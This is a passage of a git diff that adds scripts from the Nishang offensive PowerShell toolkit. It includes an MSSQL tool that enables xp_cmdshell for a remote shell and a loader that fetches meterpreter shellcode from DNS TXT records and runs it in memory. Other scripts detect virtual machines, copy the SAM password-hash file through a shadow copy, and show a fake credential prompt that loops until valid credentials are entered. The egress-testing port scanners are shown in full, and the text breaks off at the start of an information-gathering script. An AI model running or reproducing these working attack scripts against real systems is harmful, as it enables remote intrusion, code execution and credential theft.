|
||||||
|
$UserName,
|
||||||
|
|
||||||
|
[parameter(Mandatory = $true, Position = 2)]
|
||||||
|
[string]
|
||||||
|
$Password
|
||||||
|
)
|
||||||
|
|
||||||
|
Try{
|
||||||
|
function Make-Connection ($query)
|
||||||
|
{
|
||||||
|
$Connection = New-Object System.Data.SQLClient.SQLConnection
|
||||||
|
$Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
|
||||||
|
$Connection.Open()
|
||||||
|
$Command = New-Object System.Data.SQLClient.SQLCommand
|
||||||
|
$Command.Connection = $Connection
|
||||||
|
$Command.CommandText = $query
|
||||||
|
$Reader = $Command.ExecuteReader()
|
||||||
|
$Connection.Close()
|
||||||
|
}
|
||||||
|
|
||||||
|
"Connecting to $ComputerName..."
|
||||||
|
Make-Connection "EXEC sp_configure 'show advanced options',1; RECONFIGURE;"
|
||||||
|
"`nEnabling XP_CMDSHELL...`n"
|
||||||
|
Make-Connection "EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE"
|
||||||
|
write-host -NoNewline "Do you want a PowerShell shell (P) or a SQL Shell (S) or a cmd shell (C): "
|
||||||
|
$shell = read-host
|
||||||
|
while($payload -ne "exit")
|
||||||
|
{
|
||||||
|
$Connection = New-Object System.Data.SQLClient.SQLConnection
|
||||||
|
$Connection.ConnectionString = "Data Source=$ComputerName;Initial Catalog=Master;User Id=$userName;Password=$password;"
|
||||||
|
$Connection.Open()
|
||||||
|
$Command = New-Object System.Data.SQLClient.SQLCommand
|
||||||
|
$Command.Connection = $Connection
|
||||||
|
if ($shell -eq "P")
|
||||||
|
{
|
||||||
|
write-host "`n`nStarting PowerShell on the target..`n"
|
||||||
|
write-host -NoNewline "PS $ComputerName> "
|
||||||
|
$payload = read-host
|
||||||
|
$cmd = "EXEC xp_cmdshell 'powershell.exe -Command `"& {$payload}`"'"
|
||||||
|
}
|
||||||
|
elseif ($shell -eq "S")
|
||||||
|
{
|
||||||
|
write-host "`n`nStarting SQL shell on the target..`n"
|
||||||
|
write-host -NoNewline "MSSQL $ComputerName> "
|
||||||
|
$payload = read-host
|
||||||
|
$cmd = $payload
|
||||||
|
}
|
||||||
|
elseif ($shell -eq "C")
|
||||||
|
{
|
||||||
|
write-host "`n`nStarting cmd shell on the target..`n"
|
||||||
|
write-host -NoNewline "CMD $ComputerName> "
|
||||||
|
$payload = read-host
|
||||||
|
$cmd = "EXEC xp_cmdshell 'cmd.exe /K $payload'"
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
$Command.CommandText = "$cmd"
|
||||||
|
$Reader = $Command.ExecuteReader()
|
||||||
|
while ($reader.Read()) {
|
||||||
|
New-Object PSObject -Property @{
|
||||||
|
Name = $reader.GetValue(0)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$Connection.Close()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
Catch {
|
||||||
|
$error[0]
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
90
aspx/nishang/Execution/Execute-DNSTXT-Code.ps1
Normal file
90
aspx/nishang/Execution/Execute-DNSTXT-Code.ps1
Normal file
|
@ -0,0 +1,90 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Payload which could execute shellcode from DNS TXT queries.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload is able to pull shellcode from txt record of a domain. It has been tested for
|
||||||
|
first stage of meterpreter shellcode generated using msf.
|
||||||
|
Below commands could be used to generate shellcode to be usable with this payload
|
||||||
|
./msfpayload windows/meterpreter/reverse_tcp LHOST= EXITFUNC=process C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'
|
||||||
|
./msfpayload windows/x64/meterpreter/reverse_tcp LHOST= EXITFUNC=process C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2- |sed 's/^[^0]*\(0.*\/\*\).*/\1/' | sed 's/.\{2\}$//' | tr -d '\n'
|
||||||
|
|
||||||
|
.PARAMETER shellcode32
|
||||||
|
The domain (or subdomain) whose TXT records would hold 32-bit shellcode.
|
||||||
|
|
||||||
|
.PARAMETER shellcode64
|
||||||
|
The domain (or subdomain) whose TXT records would hold 64-bit shellcode.
|
||||||
|
|
||||||
|
.PARAMETER AUTHNS
|
||||||
|
Authoritative Name Server for the domains.
|
||||||
|
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Execute-DNSTXT-Code
|
||||||
|
The payload will ask for all required options.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Execute-DNSTXT-Code 32.alteredsecurity.com 64.alteredsecurity.com ns8.zoneedit.com
|
||||||
|
Use above from non-interactive shell.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.blogspot.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
.NOTES
|
||||||
|
The code execution logic is based on this post by Matt.
|
||||||
|
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.html
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Execute-DNSTXT-Code
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$ShellCode32,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$ShellCode64,
|
||||||
|
|
||||||
|
[Parameter(Position = 2, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$AuthNS
|
||||||
|
)
|
||||||
|
|
||||||
|
$code = (Invoke-Expression "nslookup -querytype=txt $shellcode32 $AuthNS")
|
||||||
|
$tmp = $code | select-string -pattern "`""
|
||||||
|
$tmp1 = $tmp -split("`"")[0]
|
||||||
|
[string]$shell = $tmp1 -replace "`t", ""
|
||||||
|
$shell = $shell.replace(" ", "")
|
||||||
|
[Byte[]]$sc32 = $shell -split ','
|
||||||
|
$code64 = (Invoke-Expression "nslookup -querytype=txt $shellcode64 $AuthNS")
|
||||||
|
$tmp64 = $code64 | select-string -pattern "`""
|
||||||
|
$tmp164 = $tmp64 -split("`"")[0]
|
||||||
|
[string]$shell64 = $tmp164 -replace "`t", ""
|
||||||
|
$shell64 = $shell64.replace(" ", "")
|
||||||
|
[Byte[]]$sc64 = $shell64 -split ','
|
||||||
|
$code = @'
|
||||||
|
[DllImport("kernel32.dll")]
|
||||||
|
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
|
||||||
|
[DllImport("kernel32.dll")]
|
||||||
|
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
|
||||||
|
[DllImport("msvcrt.dll")]
|
||||||
|
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
|
||||||
|
'@
|
||||||
|
$winFunc = Add-Type -memberDefinition $code -Name "Win32" -namespace Win32Functions -passthru
|
||||||
|
[Byte[]]$sc = $sc32
|
||||||
|
if ([IntPtr]::Size -eq 8) {$sc = $sc64}
|
||||||
|
$size = 0x1000
|
||||||
|
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
|
||||||
|
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
|
||||||
|
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
|
||||||
|
$winFunc::CreateThread(0,0,$x,0,0,0)
|
||||||
|
while(1)
|
||||||
|
{
|
||||||
|
start-sleep -Seconds 100
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
302
aspx/nishang/Gather/Check-VM.ps1
Normal file
302
aspx/nishang/Gather/Check-VM.ps1
Normal file
|
@ -0,0 +1,302 @@
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang script which detects whether it is in a known virtual machine.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This script uses known parameters or 'fingerprints' of Hyper-V, VMWare, Virtual PC, Virtual Box,
|
||||||
|
Xen and QEMU for detecting the environment.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Check-VM
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.labofapenetrationtester.com/2013/01/quick-post-check-if-your-payload-is.html
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
.NOTES
|
||||||
|
The script draws heavily from checkvm.rb post module from msf.
|
||||||
|
https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/checkvm.rb
|
||||||
|
#>
|
||||||
|
|
||||||
|
function Check-VM
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param()
|
||||||
|
$ErrorActionPreference = "SilentlyContinue"
|
||||||
|
#Hyper-V
|
||||||
|
$hyperv = Get-ChildItem HKLM:\SOFTWARE\Microsoft
|
||||||
|
if (($hyperv -match "Hyper-V") -or ($hyperv -match "VirtualMachine"))
|
||||||
|
{
|
||||||
|
$hypervm = $true
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$hypervm)
|
||||||
|
{
|
||||||
|
$hyperv = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
|
||||||
|
if ($hyperv -match "vrtual")
|
||||||
|
{
|
||||||
|
$hypervm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$hypervm)
|
||||||
|
{
|
||||||
|
$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
|
||||||
|
if ($hyperv -match "vrtual")
|
||||||
|
{
|
||||||
|
$hypervm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$hypervm)
|
||||||
|
{
|
||||||
|
$hyperv = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
|
||||||
|
if ($hyperv -match "vrtual")
|
||||||
|
{
|
||||||
|
$hypervm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$hypervm)
|
||||||
|
{
|
||||||
|
$hyperv = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||||
|
if (($hyperv -match "vmicheartbeat") -or ($hyperv -match "vmicvss") -or ($hyperv -match "vmicshutdown") -or ($hyperv -match "vmiexchange"))
|
||||||
|
{
|
||||||
|
$hypervm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($hypervm)
|
||||||
|
{
|
||||||
|
|
||||||
|
"This is a Hyper-V machine."
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
#VMWARE
|
||||||
|
|
||||||
|
$vmware = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||||
|
if (($vmware -match "vmdebug") -or ($vmware -match "vmmouse") -or ($vmware -match "VMTools") -or ($vmware -match "VMMEMCTL"))
|
||||||
|
{
|
||||||
|
$vmwarevm = $true
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$vmwarevm)
|
||||||
|
{
|
||||||
|
$vmware = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System\BIOS -Name SystemManufacturer
|
||||||
|
if ($vmware -match "vmware")
|
||||||
|
{
|
||||||
|
$vmwarevm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$vmwarevm)
|
||||||
|
{
|
||||||
|
$vmware = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
|
||||||
|
if ($vmware -match "vmware")
|
||||||
|
{
|
||||||
|
$vmwarevm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$vmwarevm)
|
||||||
|
{
|
||||||
|
$vmware = Get-Process
|
||||||
|
if (($vmware -eq "vmwareuser.exe") -or ($vmware -match "vmwaretray.exe"))
|
||||||
|
{
|
||||||
|
$vmwarevm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($vmwarevm)
|
||||||
|
{
|
||||||
|
|
||||||
|
"This is a VMWare machine."
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
#Virtual PC
|
||||||
|
|
||||||
|
$vpc = Get-Process
|
||||||
|
if (($vpc -eq "vmusrvc.exe") -or ($vpc -match "vmsrvc.exe"))
|
||||||
|
{
|
||||||
|
$vpcvm = $true
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$vpcvm)
|
||||||
|
{
|
||||||
|
$vpc = Get-Process
|
||||||
|
if (($vpc -eq "vmwareuser.exe") -or ($vpc -match "vmwaretray.exe"))
|
||||||
|
{
|
||||||
|
$vpcvm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$vpcvm)
|
||||||
|
{
|
||||||
|
$vpc = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||||
|
if (($vpc -match "vpc-s3") -or ($vpc -match "vpcuhub") -or ($vpc -match "msvmmouf"))
|
||||||
|
{
|
||||||
|
$vpcvm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($vpcvm)
|
||||||
|
{
|
||||||
|
|
||||||
|
"This is a Virtual PC."
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
#Virtual Box
|
||||||
|
|
||||||
|
$vb = Get-Process
|
||||||
|
if (($vb -eq "vboxservice.exe") -or ($vb -match "vboxtray.exe"))
|
||||||
|
{
|
||||||
|
|
||||||
|
$vbvm = $true
|
||||||
|
|
||||||
|
}
|
||||||
|
if (!$vbvm)
|
||||||
|
{
|
||||||
|
$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
|
||||||
|
if ($vb -match "vbox_")
|
||||||
|
{
|
||||||
|
$vbvm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$vbvm)
|
||||||
|
{
|
||||||
|
$vb = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
|
||||||
|
if ($vb -match "vbox_")
|
||||||
|
{
|
||||||
|
$vbvm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
if (!$vbvm)
|
||||||
|
{
|
||||||
|
$vb = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
|
||||||
|
if ($vb -match "vbox")
|
||||||
|
{
|
||||||
|
$vbvm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
if (!$vbvm)
|
||||||
|
{
|
||||||
|
$vb = Get-ItemProperty hklm:\HARDWARE\DESCRIPTION\System -Name SystemBiosVersion
|
||||||
|
if ($vb -match "vbox")
|
||||||
|
{
|
||||||
|
$vbvm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
if (!$vbvm)
|
||||||
|
{
|
||||||
|
$vb = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||||
|
if (($vb -match "VBoxMouse") -or ($vb -match "VBoxGuest") -or ($vb -match "VBoxService") -or ($vb -match "VBoxSF"))
|
||||||
|
{
|
||||||
|
$vbvm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($vbvm)
|
||||||
|
{
|
||||||
|
|
||||||
|
"This is a Virtual Box."
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#Xen
|
||||||
|
|
||||||
|
$xen = Get-Process
|
||||||
|
|
||||||
|
if ($xen -eq "xenservice.exe")
|
||||||
|
{
|
||||||
|
|
||||||
|
$xenvm = $true
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$xenvm)
|
||||||
|
{
|
||||||
|
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\FADT
|
||||||
|
if ($xen -match "xen")
|
||||||
|
{
|
||||||
|
$xenvm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$xenvm)
|
||||||
|
{
|
||||||
|
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\DSDT
|
||||||
|
if ($xen -match "xen")
|
||||||
|
{
|
||||||
|
$xenvm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$xenvm)
|
||||||
|
{
|
||||||
|
$xen = Get-ChildItem HKLM:\HARDWARE\ACPI\RSDT
|
||||||
|
if ($xen -match "xen")
|
||||||
|
{
|
||||||
|
$xenvm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
if (!$xenvm)
|
||||||
|
{
|
||||||
|
$xen = Get-ChildItem HKLM:\SYSTEM\ControlSet001\Services
|
||||||
|
if (($xen -match "xenevtchn") -or ($xen -match "xennet") -or ($xen -match "xennet6") -or ($xen -match "xensvc") -or ($xen -match "xenvdb"))
|
||||||
|
{
|
||||||
|
$xenvm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
if ($xenvm)
|
||||||
|
{
|
||||||
|
|
||||||
|
"This is a Xen Machine."
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
#QEMU
|
||||||
|
|
||||||
|
$qemu = Get-Childitem hklm:\hardware\devicemap\scsi -recurse | gp -Name identifier
|
||||||
|
if ($qemu -match "qemu")
|
||||||
|
{
|
||||||
|
|
||||||
|
$qemuvm = $true
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!$qemuvm)
|
||||||
|
{
|
||||||
|
$qemu = Get-ItemProperty hklm:HARDWARE\DESCRIPTION\System\CentralProcessor\0 -Name ProcessorNameString
|
||||||
|
if ($qemu -match "qemu")
|
||||||
|
{
|
||||||
|
$qemuvm = $true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($qemuvm)
|
||||||
|
{
|
||||||
|
|
||||||
|
"This is a Qemu machine."
|
||||||
|
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
57
aspx/nishang/Gather/Copy-VSS.ps1
Normal file
57
aspx/nishang/Gather/Copy-VSS.ps1
Normal file
|
@ -0,0 +1,57 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang Payload which copies the SAM file.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload uses the VSS service (starts it if not running), creates a shadow of C:
|
||||||
|
and copies the SAM file which could be used to dump password hashes from it. This must be run from an elevated shell.
|
||||||
|
|
||||||
|
.PARAMETER PATH
|
||||||
|
The path where SAM file would be saved. The folder must exist already.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Copy-VSS
|
||||||
|
Saves the SAM file in current run location of the payload.
|
||||||
|
|
||||||
|
.Example
|
||||||
|
PS > Copy-VSS -path C:\temp
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.canhazcode.com/index.php?a=4
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
.NOTES
|
||||||
|
Code by @al14s
|
||||||
|
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
function Copy-VSS
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$Path
|
||||||
|
)
|
||||||
|
$service = (Get-Service -name VSS)
|
||||||
|
if($service.Status -ne "Running")
|
||||||
|
{
|
||||||
|
$notrunning=1
|
||||||
|
$service.Start()
|
||||||
|
}
|
||||||
|
$id = (gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
|
||||||
|
$volume = (gwmi win32_shadowcopy -filter "ID='$id'")
|
||||||
|
$filepath = "$pwd\SAM"
|
||||||
|
if ($path)
|
||||||
|
{
|
||||||
|
$filepath = "$path\SAM"
|
||||||
|
}
|
||||||
|
|
||||||
|
`cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" $filepath`
|
||||||
|
$volume.Delete()
|
||||||
|
if($notrunning -eq 1)
|
||||||
|
{
|
||||||
|
$service.Stop()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
49
aspx/nishang/Gather/Credentials.ps1
Normal file
49
aspx/nishang/Gather/Credentials.ps1
Normal file
|
@ -0,0 +1,49 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang Payload which opens a user credential prompt.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload opens a prompt which asks for user credentials and
|
||||||
|
does not go away till valid credentials are entered in the prompt.
|
||||||
|
The credentials can then exfiltrated using method of choice.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Credentials
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.blogspot.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Credentials
|
||||||
|
{
|
||||||
|
[CmdletBinding()]
|
||||||
|
Param ()
|
||||||
|
|
||||||
|
$ErrorActionPreference="SilentlyContinue"
|
||||||
|
Add-Type -assemblyname system.DirectoryServices.accountmanagement
|
||||||
|
$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
|
||||||
|
$domainDN = "LDAP://" + ([ADSI]"").distinguishedName
|
||||||
|
while($true)
|
||||||
|
{
|
||||||
|
$credential = $host.ui.PromptForCredential("Credentials are required to perform this operation", "Please enter your user name and password.", "", "")
|
||||||
|
if($credential)
|
||||||
|
{
|
||||||
|
$creds = $credential.GetNetworkCredential()
|
||||||
|
[String]$user = $creds.username
|
||||||
|
[String]$pass = $creds.password
|
||||||
|
[String]$domain = $creds.domain
|
||||||
|
$authlocal = $DS.ValidateCredentials($user, $pass)
|
||||||
|
$authdomain = New-Object System.DirectoryServices.DirectoryEntry($domainDN,$user,$pass)
|
||||||
|
if(($authlocal -eq $true) -or ($authdomain.name -ne $null))
|
||||||
|
{
|
||||||
|
$output = "Username: " + $user + " Password: " + $pass + " Domain:" + $domain + " Domain:"+ $authdomain.name
|
||||||
|
$output
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
67
aspx/nishang/Gather/FireBuster.ps1
Normal file
67
aspx/nishang/Gather/FireBuster.ps1
Normal file
|
@ -0,0 +1,67 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
This script is part of Nishang. FireBuster is a PowerShell script that does egress testing. It is to be run on the target machine.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
FireBuster sends packets to FireListener, which hosts a listening server. By default, FireBuster sends packets to all ports (which could be VERY slow).
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS> FireBuster 10.10.10.10 1000-1020
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS> FireBuster 10.10.10.10 1000-1020 -Verbose
|
||||||
|
Use above for increased verbosity.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.labofapenetrationtester.com/2014/04/egress-testing-using-powershell.html
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
http://roo7break.co.uk
|
||||||
|
|
||||||
|
.NOTES
|
||||||
|
Major part of the script is written by Nikhil ShreeKumar (@roo7break)
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
function FireBuster{
|
||||||
|
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$targetip = $(throw "Please specify an EndPoint (Host or IP Address)"),
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $False)]
|
||||||
|
[String] $portrange = "1-65535"
|
||||||
|
)
|
||||||
|
|
||||||
|
$ErrorActionPreference = 'SilentlyContinue'
|
||||||
|
[int] $lowport = $portrange.split("-")[0]
|
||||||
|
[int] $highport = $portrange.split("-")[1]
|
||||||
|
|
||||||
|
$hostaddr = [system.net.IPAddress]::Parse($targetip)
|
||||||
|
Write-Verbose "Trying to connect to $hostaddr from $lowport to $highport"
|
||||||
|
[int] $ports = 0
|
||||||
|
Write-Host "Sending...."
|
||||||
|
for($ports=$lowport; $ports -le $highport ; $ports++){
|
||||||
|
try{
|
||||||
|
Write-Verbose "Trying port $ports"
|
||||||
|
$client = New-Object System.Net.Sockets.TcpClient
|
||||||
|
$beginConnect = $client.BeginConnect($hostaddr,$ports,$null,$null)
|
||||||
|
$TimeOut = 300
|
||||||
|
if($client.Connected)
|
||||||
|
{
|
||||||
|
Write-Host "Connected to port $ports" -ForegroundColor Green
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
Start-Sleep -Milli $TimeOut
|
||||||
|
if($client.Connected)
|
||||||
|
{
|
||||||
|
Write-Host "Connected to port $ports" -ForegroundColor Green
|
||||||
|
}
|
||||||
|
}
|
||||||
|
$client.Close()
|
||||||
|
}catch { Write-Error $Error[0]}
|
||||||
|
}
|
||||||
|
Write-Host "Data sent to all ports"
|
||||||
|
}
|
||||||
|
|
95
aspx/nishang/Gather/FireListener.ps1
Normal file
95
aspx/nishang/Gather/FireListener.ps1
Normal file
|
@ -0,0 +1,95 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
This script is part of Nishang. FireListener is a PowerShell script that does egress testing. It is to be run on the attacking/listening machine.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
FireListener hosts a listening server to which FireBuster can send packets to. Firebuster is to be run on the target machine which is to
|
||||||
|
be tested for egress filtering.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > FireListener -portrange 1000-1020
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.labofapenetrationtester.com/2014/04/egress-testing-using-powershell.html
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
http://roo7break.co.uk
|
||||||
|
|
||||||
|
.NOTES
|
||||||
|
Based on the script written by Nikhil ShreeKumar (@roo7break)
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
function FireListener
|
||||||
|
{
|
||||||
|
Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$PortRange
|
||||||
|
)
|
||||||
|
|
||||||
|
$ErrorActionPreference = 'SilentlyContinue'
|
||||||
|
#Code which opens a socket for each port
|
||||||
|
$socketblock = {
|
||||||
|
param($port = $args[1])
|
||||||
|
try
|
||||||
|
{
|
||||||
|
|
||||||
|
$EndPoint = New-Object System.Net.IPEndPoint([ipaddress]::any, $port)
|
||||||
|
$ListenSocket = New-Object System.Net.Sockets.TCPListener $EndPoint
|
||||||
|
$ListenSocket.Start()
|
||||||
|
$RecData = $ListenSocket.AcceptTCPClient()
|
||||||
|
$clientip = $RecData.Client.RemoteEndPoint.Address.ToString()
|
||||||
|
$clientport = $RecData.Client.LocalEndPoint.Port.ToString()
|
||||||
|
Write-Host "$clientip connected through port $clientport" -ForegroundColor Green
|
||||||
|
$Stream.Close()
|
||||||
|
$ListenSocket.Stop()
|
||||||
|
} catch
|
||||||
|
{ Write-Error $Error[0] }
|
||||||
|
}
|
||||||
|
|
||||||
|
[int] $lowport = $portrange.split("-")[0]
|
||||||
|
[int] $highport = $portrange.split("-")[1]
|
||||||
|
[int] $ports = 0
|
||||||
|
Get-Job | Remove-Job
|
||||||
|
|
||||||
|
#Start a job for each port
|
||||||
|
for($ports=$lowport; $ports -le $highport; $ports++)
|
||||||
|
{
|
||||||
|
"Listening on port $ports"
|
||||||
|
$job = start-job -ScriptBlock $socketblock -ArgumentList $ports -Name $ports
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
[console]::TreatControlCAsInput = $true
|
||||||
|
while ($true)
|
||||||
|
{
|
||||||
|
# code from http://poshcode.org/542 to capture Ctrl+C
|
||||||
|
# start code snip
|
||||||
|
if ($Host.UI.RawUI.KeyAvailable -and (3 -eq [int]$Host.UI.RawUI.ReadKey("AllowCtrlC,IncludeKeyUp,NoEcho").Character))
|
||||||
|
{
|
||||||
|
Write-Host "Stopping all jobs.....This can take many minutes." -Background DarkRed
|
||||||
|
Sleep 2
|
||||||
|
Get-Job | Stop-Job
|
||||||
|
Get-Job | Remove-Job
|
||||||
|
#Stop-Process -Id $PID
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
# end code snip
|
||||||
|
|
||||||
|
|
||||||
|
#Start a new job which listens on the same port for every completed job.
|
||||||
|
foreach ($job1 in (Get-Job))
|
||||||
|
{
|
||||||
|
Start-Sleep -Seconds 4
|
||||||
|
Get-Job | Receive-Job
|
||||||
|
if ($job1.State -eq "Completed")
|
||||||
|
{
|
||||||
|
$port = $job1.Name
|
||||||
|
"Listening on port $port"
|
||||||
|
$newjobs = start-job -ScriptBlock $socketblock -ArgumentList $port -Name $port
|
||||||
|
Get-Job | Remove-Job
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
62
aspx/nishang/Gather/Get-Information.ps1
Normal file
62
aspx/nishang/Gather/Get-Information.ps1
Normal file
|
@ -0,0 +1,62 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang Payload which gathers juicy information from the target.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload extracts information form registry and some commands.
|
||||||
|
The information available would be dependent on the privilege with
|
||||||
|
which the script would be executed.
|
||||||
|
|
||||||
|
.EXAMPLE
|
